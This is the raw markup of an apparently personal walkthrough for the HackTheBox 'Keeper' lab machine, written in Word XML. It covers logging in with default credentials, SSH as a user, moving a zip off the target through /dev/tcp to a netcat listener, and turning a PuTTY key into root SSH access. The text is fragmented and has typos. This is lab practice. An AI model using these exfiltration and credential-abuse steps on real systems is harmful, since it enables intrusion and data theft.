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696B3C3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256DAB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Keeper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70A0AF4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256DAB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2265D41C" w14:textId="0D6B9E92" w:rsidR="009C1700" w:rsidRPr="00CA188D" w:rsidRDefault="009C1700" w:rsidP="00CA188D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At </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>last</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> we search default credentials of request checker default password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684A77E8" w:rsidR="00843DCE" w:rsidRDefault="009C170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user.txt Its ssh so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its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done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50848D14" w14:textId="77777777" w:rsidR="009C1700" w:rsidRDefault="009C1700" w:rsidP="009C1700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 to the admin -&gt; user. We notice that there has 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0716B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> user’s dataset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082517BA" w14:textId="77777777" w:rsidR="009C1700" w:rsidRDefault="009C1700" w:rsidP="009C1700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we see the username and password both</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120BFDC9" w14:textId="77777777" w:rsidR="009C1700" w:rsidRDefault="009C1700" w:rsidP="009C1700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</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> In terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7113B8DF" w14:textId="77777777" w:rsidR="009C1700" w:rsidRDefault="009C1700" w:rsidP="009C1700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Ssh lonorgard@</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>keeper,htb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p w14:paraId="1CA82D56" w14:textId="77777777" w:rsidR="009C1700" w:rsidRDefault="009C1700" w:rsidP="009C1700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Enter the password which is given below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE00C7D" w14:textId="77777777" w:rsidR="009C1700" w:rsidRDefault="009C1700" w:rsidP="009C1700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 we obtain the user.txt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8. Root Proof</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA92174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we see the 30000.zip file so try to download it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7524C0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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>other</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> terminal </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0FA9C7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Nc -lvnp 9001 &gt; RT30000.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF0EA78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keeper terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685FD9C1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Cat RT30000.zip &gt; /dev/tcp/10.10.14.8/9001 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4031AAFD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Sent it and download into our box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFF14FD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search google puttygen source code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D4EDAC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copy the link </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>that .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">tar.gz file </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AECF6D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wget paste_link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5870D4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mkdir putty //cd into it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DED1B86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tar -zxvf ../putty-0.80.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C45F1D2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putty-0.80/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725ACECA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cmake .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="20BC22DB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cmake –</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>build .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> //for putty gan we did it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C91EE9E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find .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -name puttygen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C130B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cp puttygen</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ../..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F35958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 //we see putty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B788B1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enter that which we copy form the google as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7103D4BA" w14:textId="2A3A140A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./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>puttygen root.ppk -0 provate-openshh -o id_</w:t>
      </w:r>
      <w:r w:rsidR="00A73321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sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B04C906" w14:textId="399AE615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id_</w:t>
      </w:r>
      <w:r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sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A0C2EC" w14:textId="7DB3CDF4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Chmod 600 id_</w:t>
      </w:r>
      <w:r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sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F62A61C" w14:textId="60FC6202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ssh -i id_</w:t>
      </w:r>
      <w:r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sa root@keeper.htb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168B59DD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 we get looked in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B033704" w14:textId="77777777" w:rsidR="0009680C" w:rsidRDefault="0009680C" w:rsidP="0009680C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there has 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9680C"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="00256DAB"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00900890"/>
    <w:rsid w:val="009C1700"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00A73321"/>
    <w:rsid w:val="00CA188D"/>
    <w:rsid w:val="00CC126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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-13T15:42:00Z</dcterms:modified>
</cp:coreProperties>
</file>